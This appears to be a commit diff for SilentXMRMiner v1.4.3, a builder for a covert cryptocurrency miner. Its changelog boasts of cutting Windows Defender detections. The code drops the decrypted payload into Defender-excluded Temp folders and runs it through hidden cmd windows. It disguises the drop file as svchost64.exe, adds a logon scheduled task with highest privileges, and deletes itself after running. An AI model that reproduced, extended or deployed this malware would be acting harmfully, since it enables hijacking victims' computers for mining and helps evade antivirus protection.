Updated to v1.4.3

* Greatly reduced Windows Defender detections when "Bypass Windows Defender" is enabled by replacing Assembly.Load with simply writing the payload to Temp and executing it since the folders are excluded
* Fixed the paths for systems that have custom lowercase characters like Turkish

README.md

@@ -1,7 +1,7 @@
 
 <img src="https://github.com/UnamSanctam/SilentXMRMiner/blob/master/SilentXMRMiner.png?raw=true">
 
-# SilentXMRMiner v1.4.2 - Based on Lime Miner v0.3
+# SilentXMRMiner v1.4.3 - Based on Lime Miner v0.3
 
 Can mine all the following algorithms and thus all the cryptocurrencies that use them: **cn/upx2**, **argon2/chukwav2**, **cn/ccx**, **kawpow**, **rx/keva**, **astrobwt**, **cn-pico/tlo**, **rx/sfx**, **rx/arq**, **rx/0**, **argon2/chukwa**, **argon2/wrkz**, **rx/wow**, **cn/fast**, **cn/rwz**, **cn/zls**, **cn/double**, **cn/r**, **cn-pico**, **cn/half**, **cn/2**, **cn/xao**, **cn/rto**, **cn-heavy/tube**, **cn-heavy/xhv**, **cn-heavy/0**, **cn/1**, **cn-lite/1**, **cn-lite/0** and **cn/0**.
 
@@ -41,6 +41,9 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w
 
 ## Changes
 
+### v1.4.3 (19/07/2021)
+* Greatly reduced Windows Defender detections when "Bypass Windows Defender" is enabled by replacing Assembly.Load with simply writing the payload to Temp and executing it since the folders are excluded
+* Fixed the paths for systems that have custom lowercase characters like Turkish
 ### v1.4.2 (14/07/2021)
 * Remade watchdog to reduce detections
 * Obfuscated more strings to reduce new Windows Defender detections

SilentXMRMiner/Codedom.vb

@@ -29,7 +29,6 @@ Public Class Codedom
                 .ReferencedAssemblies.Add("System.Windows.Forms.dll")
             End If
             .ReferencedAssemblies.Add("System.dll")
-            .ReferencedAssemblies.Add("System.Core.dll")
             .ReferencedAssemblies.Add("System.Management.dll")
             .ReferencedAssemblies.Add("System.IO.Compression.dll")
             .ReferencedAssemblies.Add("System.IO.Compression.FileSystem.dll")
@@ -208,7 +207,6 @@ Public Class Codedom
             .CompilerOptions = OP
             .IncludeDebugInformation = False
             .ReferencedAssemblies.Add("System.dll")
-            .ReferencedAssemblies.Add("System.Core.dll")
             .ReferencedAssemblies.Add("System.Management.dll")
             If F.FA.toggleEnableDebug.Checked Then
                 .ReferencedAssemblies.Add("System.Windows.Forms.dll")
@@ -314,6 +312,7 @@ Public Class Codedom
         stringb.Replace("#WATCHDOG", F.EncryptString("sihost64"))
         stringb.Replace("#TASKSCH", F.EncryptString("/c schtasks /create /f /sc onlogon /rl highest /tn "))
         stringb.Replace("#MINERID", F.EncryptString("--cinit-find-x"))
+        stringb.Replace("#DROPFILE", F.EncryptString("svchost64.exe"))
         stringb.Replace("#InjectionTarget", F.EncryptString(F.InjectionTarget(0)))
         stringb.Replace("#InjectionDir", F.InjectionTarget(1).Replace("(", "").Replace(")", "").Replace("%WINDIR%", """ + Environment.GetFolderPath(Environment.SpecialFolder.Windows) + """))
 
@@ -333,6 +332,7 @@ Public Class Codedom
         stringb.Replace("RLoader", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("RUninstaller", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("RProgram", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("RExit", F.Randomi(F.rand.Next(5, 40)))
 
         stringb.Replace("rarg1", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("rarg2", F.Randomi(F.rand.Next(5, 40)))

SilentXMRMiner/Resources/Loader.cs

@@ -8,7 +8,6 @@
 using System.Threading;
 using System.Diagnostics;
 using System.Runtime.InteropServices;
-using System.Linq;
 #if DefDebug
 using System.Windows.Forms;
 #endif
@@ -64,7 +63,20 @@ public static void Main()
 
         try
         {
+#if DefKillWD
+            string fn = Path.Combine(Path.GetTempPath(), Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String("#DROPFILE"))));
+            File.WriteAllBytes(fn, RAES_Method((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program")));
+            Process.Start(new ProcessStartInfo
+            {
+                FileName = "cmd",
+                Arguments = "/c " + fn + " \"" + Assembly.GetEntryAssembly().Location + "\"",
+                WorkingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
+                WindowStyle = ProcessWindowStyle.Hidden,
+                CreateNoWindow = true,
+            });
+#else
             Assembly.Load(RAES_Method((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program"))).EntryPoint.Invoke(null, new object[0]);
+#endif        
         }
         catch (Exception ex)
         {

SilentXMRMiner/Resources/Program.cs

@@ -28,12 +28,17 @@
 public partial class RProgram
 {
 #if DefSystem32
-    public static string rbD = ((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) + @"\" + RGetString("#LIBSPATH")).ToLower();
+    public static string rbD = ((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) + @"\" + RGetString("#LIBSPATH"));
 #else
-    public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH")).ToLower();
+    public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH"));
 #endif
 #if DefInstall
-    public static string rplp = (PayloadPath).ToLower();
+    public static string rplp = PayloadPath;
+#endif
+#if DefKillWD
+    public static string cmdl = Environment.GetCommandLineArgs()[1];
+#else
+    public static string cmdl = Assembly.GetEntryAssembly().Location;
 #endif
 
     public static void Main()
@@ -67,7 +72,7 @@ public static void Main()
 #endif
         }
 
-       if (Assembly.GetEntryAssembly().Location.ToLower() != rplp)
+       if (cmdl.ToLower() != rplp.ToLower())
         {
             foreach (Process proc in Process.GetProcessesByName(RGetString("#WATCHDOG")))
             {
@@ -85,7 +90,7 @@ public static void Main()
             } catch(Exception ex) {}
 
             Directory.CreateDirectory(Path.GetDirectoryName(rplp));
-            File.Copy(Assembly.GetEntryAssembly().Location.ToLower(), rplp, true);
+            File.Copy(cmdl, rplp, true);
             Thread.Sleep(2 * 1000);
             Process.Start(new ProcessStartInfo
             {
@@ -94,7 +99,7 @@ public static void Main()
                 WindowStyle = ProcessWindowStyle.Hidden,
                 CreateNoWindow = true,
             });
-            Environment.Exit(0);
+            RExit();
         }
 #endif
 
@@ -140,7 +145,7 @@ public static void Main()
             {
                 if (MemObj != null && MemObj["CommandLine"] != null && MemObj["CommandLine"].ToString().Contains(RGetString("#MINERID")))
                 {
-                    Environment.Exit(0);
+                    RExit();
                 }
             }
 
@@ -290,6 +295,7 @@ public static void Main()
             MessageBox.Show("M8: " + Environment.NewLine + ex.ToString());
 #endif
         }
+        RExit();
     }
 
     public static byte[] RGetTheResource(string rarg1)
@@ -312,6 +318,20 @@ public static string RTruncate(string rarg1, int rarg2)
         return rarg1.Length > rarg2 ? rarg1.Substring(0, rarg2) : rarg1;
     }
 
+    public static void RExit()
+    {
+#if DefKillWD
+        Process.Start(new ProcessStartInfo()
+        {
+            FileName = "cmd",
+            Arguments = "/C choice /C Y /N /D Y /T 3 & Del \"" + Assembly.GetEntryAssembly().Location + "\"",
+            WindowStyle = ProcessWindowStyle.Hidden,
+            CreateNoWindow = true
+        });
+#endif
+        Environment.Exit(0);
+    }
+
 #if DefGPU
     public static string RGetGPU()
     {

SilentXMRMiner/Resources/Uninstaller.cs

@@ -19,9 +19,9 @@
 
 public partial class RUninstaller
 {
-    public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH")).ToLower();
+    public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH"));
 #if DefSystem32
-    public static string rbD2 = (Environment.SystemDirectory + @"\" + RGetString("#LIBSPATH")).ToLower();
+    public static string rbD2 = (Environment.SystemDirectory + @"\" + RGetString("#LIBSPATH"));
 #endif
 
     public static void Main()
@@ -47,7 +47,7 @@ public static void Main()
             {
                 if (key != null)
                 {
-                    key.DeleteValue(Path.GetFileName(PayloadPath).ToLower());
+                    key.DeleteValue(Path.GetFileName(PayloadPath));
                 }
             }
         }
@@ -117,7 +117,7 @@ public static void Main()
             Directory.Delete(rbD2, true);
 #endif
 #if DefInstall
-            File.Delete((PayloadPath).ToLower());
+            File.Delete(PayloadPath);
 #endif
         }
         catch (Exception ex)

SilentXMRMiner/Resources/Watchdog.cs

@@ -24,7 +24,7 @@ public partial class RProgram
 {
     public static byte[] rxM = { };
     public static int rcheckcount = 0;
-    public static string rplp = (PayloadPath).ToLower();
+    public static string rplp = PayloadPath;
 
     public static void Main()
     {